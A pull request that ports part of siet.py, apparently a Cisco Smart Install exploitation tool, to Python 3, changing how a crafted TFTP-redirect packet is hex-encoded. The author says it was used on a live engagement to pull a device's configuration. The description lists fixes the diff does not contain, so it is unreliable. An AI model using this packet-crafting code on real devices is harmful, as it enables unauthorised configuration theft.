### PR TITLE
Fix file mode handling and hex encoding for Python 3 compatibility

### DIFF
--- a/siet.py
+++ b/siet.py
@@ -11,7 +11,7 @@ import subprocess
 import time
 import threading
 import queue
-
+import binascii
 
 def get_argm_from_user():
   """ Set arguments for running"""
@@ -247,9 +247,9 @@ def change_tftp(mode, current_ip):
 
     sTcp = '0' * 7 + '1' + '0' * 7 + '1' + '0' * 7 + '800000' + '40800010014' + '0' * 7 + '10' + '0' * 7 + 'fc994737866' + '0' * 7 + '0303f4'
 
-    sTcp = sTcp + c1.encode('hex') + '00' * (336 - len(c1))
-    sTcp = sTcp + c2.encode('hex') + '00' * (336 - len(c2))
-    sTcp = sTcp + c3.encode('hex') + '00' * (336 - len(c3))
+    sTcp = sTcp + binascii.hexlify(c1.encode()).decode() + '00' * (336 - len(c1))
+    sTcp = sTcp + binascii.hexlify(c2.encode()).decode() + '00' * (336 - len(c2))
+    sTcp = sTcp + binascii.hexlify(c3.encode()).decode() + '00' * (336 - len(c3))
 
   elif mode == 'update_ios':
     get_ios_for_tftp()


### PR DESCRIPTION
SIETpy3 has never worked for me.  ChatGPT suggested these fixes, but it's now working for me on a live engagement/cisco smart install host to download the config.  But if this breaks anything... blame chatgpt.

- Replaced ord() usage with direct byte indexing to handle byte objects properly.
- Corrected file mode (fMode) handling to ensure valid read/write and binary modes.
- Updated hex encoding/decoding to use binascii for Python 3.
- Added proper handling of octet (binary) mode for TFTP transfers.



